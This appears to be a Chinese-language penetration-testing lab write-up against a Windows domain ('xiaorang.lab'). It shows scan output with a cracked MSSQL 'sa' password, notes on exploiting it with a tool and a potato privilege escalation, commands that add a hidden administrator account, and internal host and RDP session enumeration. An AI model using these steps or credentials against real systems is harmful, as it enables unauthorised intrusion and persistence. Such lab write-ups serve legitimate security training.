39.101.143.29:80 open 39.101.143.29:1433 open [*] alive ports len is: 2 start vulscan [*] WebTitle http://39.101.143.29 code:200 len:703 title:IIS Windows Server [+] mssql 39.101.143.29:1433:sa 1qaz!QAZ
mssql弱口令漏洞,MDUT直接打,激活组件后土豆提权
可以加个用户
1 2
net user Chu0 whoami@666 /add net localgroup administrators Chu0 /add
172.22.8.15:88 open 172.22.8.46:135 open 172.22.8.18:135 open 172.22.8.46:80 open 172.22.8.18:80 open 172.22.8.31:445 open 172.22.8.18:1433 open 172.22.8.15:445 open 172.22.8.46:445 open 172.22.8.18:445 open 172.22.8.31:139 open 172.22.8.15:139 open 172.22.8.46:139 open 172.22.8.18:139 open 172.22.8.31:135 open 172.22.8.15:135 open [*] NetInfo [*]172.22.8.31 [->]WIN19-CLIENT [->]172.22.8.31 [*] NetInfo [*]172.22.8.46 [->]WIN2016 [->]172.22.8.46 [*] WebTitle http://172.22.8.18 code:200 len:703 title:IIS Windows Server [*] NetBios 172.22.8.15 [+] DC:XIAORANG\DC01 [*] NetInfo [*]172.22.8.15 [->]DC01 [->]172.22.8.15 [*] NetInfo [*]172.22.8.18 [->]WIN-WEB [->]172.22.8.18 [->]2001:0:348b:fb58:2076:31a7:d89a:70e2 [*] NetBios 172.22.8.31 XIAORANG\WIN19-CLIENT [*] NetBios 172.22.8.46 WIN2016.xiaorang.lab Windows Server 2016 Datacenter 14393 [*] WebTitle http://172.22.8.46 code:200 len:703 title:IIS Windows Server [+] mssql 172.22.8.18:1433:sa 1qaz!QAZ
发现似乎没有什么能直接打的服务,回到入口机
1 2
net user #查看当前机器用户 quser || qwinst #查看在线用户
1 2 3
用户名 会话名 ID 状态 空闲时间 登录时间 john rdp-tcp#0 2 运行中 17 2024/8/20 16:32 chu0 rdp-tcp#2 3 运行中 3 2024/8/20 16:40